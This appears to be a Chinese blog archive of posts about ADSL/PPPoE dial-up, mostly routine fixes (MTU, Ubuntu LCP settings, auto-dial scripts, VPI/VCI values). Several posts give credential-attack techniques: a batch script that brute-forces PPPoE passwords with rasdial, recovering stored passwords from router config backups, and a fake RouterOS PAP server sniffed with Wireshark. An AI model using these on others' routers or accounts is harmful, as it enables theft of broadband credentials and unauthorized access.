解决OpenWrt因MTU值导致ADSL的PPPoE拨号经常断网

最近刷了新的Openwrt固件,发现ADSL拨号很慢,即WAN接口连接不上,有时候要等好几分钟才能连接上,有时候连接上了没过几分钟又断线了,又要等很久才能连接到。于是自己动手排查,用电脑直接连接网线去modem拨号,发现没问题。于是查了资料,发现很有可能是Openwrt路由器的MTU导致的。默认固件的MTU是1500。

【MTU科普一下】

关于 MTU
MTU (最大传输单元)是网络设备传输的信息包最大值。对于各种路由器,最佳的MTU值通常都是默认值。有时,更改MTU值可提高设备工作性能,做起来很简单,但事实上,这样做往往会导致出现 Continue reading "解决OpenWrt因MTU值导致ADSL的PPPoE拨号经常断网"

获取TP-LINK等路由器中ADSL的PPPoE账号和密码

Pop:其实还在大学时候我就发布了一片关于获取路由器中密码的文章,不过是抓包获取,必须要接触到路由器实体。

(原文地址:获取保存在路由器中的ADSL账号和密码http://429006.com/article/technology/1810.htm),前几天偶然发现其实不需要抓包都行的。

具体原理就是利用备份配置文件来查找,在系统工具->备份系统配置文件得到config.bin即可。

因为config.bin保存的并不是明文文件,这里就需要使用分析工具(RouterPassView),要不然很难看出密码

将配置文件导出后,用RouterPassView打开配置文件就可以看到ADSL密码和用户名,还可以看到登录的用户名和密码,这也是最为有效的方法

Supported Routers支持路由器列表:

Due to large amount of router models available in the market, it's impossible to support all of them.
For now, RouterPassView supports a limited Continue reading "获取TP-LINK等路由器中ADSL的PPPoE账号和密码"

穷举ADSL中PPPoE拨号的帐号密码的批处理

先把你所有的用户名放到一个名叫pass.txt中,密码每行一个,并与bat文件放在同一个文件夹下。result.txt是自动生成的,主要是记录拨号的日志。

将下面代码保存为*.bat文件,如pop.bat

@echo off
echo 开始PPPoE密码穷举!
for /f "delims=, tokens=1" %%i in (pass.txt) do echo %%i&rasdial 宽带连接名称 宽带用户名 %%i >>result.txt
echo "没有可用的密码了,请添加更多拨号密码到pass.txt文件中!"
pause

如果是密码一样,穷举宽带 Continue reading "穷举ADSL中PPPoE拨号的帐号密码的批处理"

Ubuntu下ADSL上网掉线问题

用Ubuntu上网过国一段时间便会自动掉线,只要执行一下udo pon dsl-provider就又能上线,但过一段时间又会掉线。
参考了下面的文章,但故障似乎依然存在。请高手指点,不知道有没有人跟我一样情况的?

----但默认的设置有个很明显 的缺陷,lcp-echo-failure次数被设为4,而lcp-echo-interval设为30秒。也就是说,如果120秒钟之内,ADSL服务器没有给回echo-reply信号,UBuntu便会认为网络已经出了问题,马上中断重联,搞得人非常不爽。
这个傻问题也很好解决,sudo gedit /etc/ppp/options将lcp-echo-failure次数设为一个较大的数值就行了,比如40,这样就比 Continue reading "Ubuntu下ADSL上网掉线问题"

利用.pbk来实现ADSL开机自动拨号

当你新建拨号连接或者VPN连接之后在你的电脑里会创建一个.pbk的文件

这个.pbk的文件可以说是一个集合,将你电脑的所有连接都保存在一起。

同时你还可以将此连接复制起来传给其他人。

系统默认的.pbk的路径为:
%appdata%\Microsoft\Network\Connections\Pbk\rasphone.pbk

很多做VPN生意的人就是将.pbk文件直接提供 Continue reading "利用.pbk来实现ADSL开机自动拨号"

武汉电信/网通/铁通 ADSL VPI/VCI值

pop:昨天同学家里的TP-LINK 89541G一体机要设置共享上网,搞了好半天都不行,我就知道是VPI和VCI的值有问题。后来到PC沙龙去搜索了一下铁通,结果找到了。顺便把其他运营商的都发出来。

运营商 VPI VCI
武汉电信 0 32
武汉网通 0 35
武汉铁通 0 35

TP-LINK 89541G里面将“系统模式”里面修改为 PVC1 ,就自动会变成0 35了。其他的自己试一下。在“ADSL设置”里面有。

获取保存在路由器中的ADSL账号和密码

pop:昨天用自己的路由器测试了一下,果然可以获取到,很实用。主要就是建立Ros的PPPoE的命令长了点,呵呵。

一、原理
ADSL用户采用PPP协议中的PAP协议或CHAP协议进行身份验证,由于PAP协议采用明文传输密钥信息,所以该信息——ADSL账号和密码 ,可以通过监听的方法得到。关于PPP协议和PPPoE协议的详细介绍请参照其他相关资料。

二、大致思路
建立一台PPPoE服务器,身份验证方式采用PAP协议,当路由器与这台服务器通信的时候进行监听,即可获取保存在路由器中的ADSL账号和密码。

三、测试过程
1、建立一台PPPoE服务器
VMware Workstation(6.5.2)和RouterOS(3.20)的组合方式可以迅速搭建一个符合测试要求的PPPoE服务器。下面是一些关键步骤的图解:
图(1):Guest operating system(Other),Version(Other)

图(2):Network connection(Use bridged networking)

图(3):Host Virtual Network Mapping

该设置属于VMware Workstation的全局设置,在主菜单Edit->Virtual Network Editor中。VMnet0与物理网卡关联,因为该物理网卡会用来连接路由器的WAN口。
图(4):VMnet0的状态,其中VMnet1和VMnet8是VMware Workstation默认安装的,不必理会

图(5):Virtual Machine Settings->Hardware->Network Adapter->Network connection->Custom:Specific virtual network(VMnet0)

该设置将虚拟系统(RouterOS)的网卡指定为VMnet0。这样一来,RouterOS中的网卡会与物理网卡关联,见图(3)中的设置。
在这个界面中,设置光驱直接指定mikrotik-3.20.iso,顺便删除一些无用的硬件,如:声卡,软驱。
图(6):运行虚拟机,安装RouterOS,仅安装system和ppp,按方向键进行选择,空格为选定

图(7):创建一个PPPoE服务器

进入RouterOS,用户名为:admin,密码为空,然后依次执行如下命令:

/interface print
/interface pppoe-server server add interface=ether1 service-name=Fake-PPPoE-Server authentication=pap
/interface pppoe-server server print
/interface pppoe-server server enable 0
/interface pppoe-server server print

2、用Wireshark监听ADSL的账号和密码
图(8):配置路由器

WAN口连接类型为PPPoE,输入上网账号和密码。连接模式为自动连接,目的:路由器通电后就会自动连接PPPoE服务器,方便监听。设置完毕后关闭路由器电源。

pop注:如果是单纯的为了破解密码,这一步可以省略掉,因为可以上网的路由器都是设置好了的

用网线将物理网卡与路由器的WAN口连接起来,运行Wireshark,监听本地物理网卡,然后路由器通电。
图(9):发现PPPoE服务器——Fake-PPPoE-Server


图(10):发现ADSL的账号和密码

四、相关提示
1、如果是远程的路由器,无法与其WAN口进行物理连接,可利用某些路由器中提供的“备份和载入配置”功能,将配置信息保存下来,然后找一台型号一样的路由器,载入配置文件,然后进行密码获取。
2、pop发现TP-link、D-Link的好像很多都可以,但是不要认为所有的路由器都像D-Link推出的DI-504M一样,把ADSL的账号和密码以明文的形式保存在配置文件中;所以是否能获取密码还有运气成分。

五、相关软件下载

RouterOS(3.20)
http://www.mikrotik.com/download/mikrotik-3.20.iso

Wireshark(Ethereal) v1.1.3
http://www.crsky.com/soft/5357.html

原文地址:
http://blog.163.com/prince_vegeta/blog/static/28180356200931693013829/

武汉电信ADSL宽带密码修改的几种方法

 

武汉电信的密码是可以到网上直接修改的,具体页面及其他方法已经给出

1、拨打10000转人工咨询

2、直接携带有效证件到营业厅重置密码

3、登陆http://self.wh.hb.cn:10000/input_chg_cust_passwdadsl.ktcl这个页面进行修改

更多相关资料:
http://hi.wuhan.net.cn/service/index.htm

ADSL宽带自动拨号VBS版

实现效果:开机自动实现adsl的拨号过程

将下面的代码保存为 *.vbs后缀的文件,如adsl.vbs;然后添加到启动项目即可

代码如下:

dim wsh
set wsh=WScript.CreateObject("WScript.Shell")
wsh.run "Rasdial 宽带连接名称 帐号 密码 ",false,1

说明:
代码中的“宽带连接名称”修改为你的网络连接名称(一般为宽带连接或者adsl等)
账号、密码分别修改为你的ADSL账号和密码

还有另外一段代码:

CreateObject("WScript.Shell").Run "rasdial 宽带连接 宽带帐号 宽带密码",0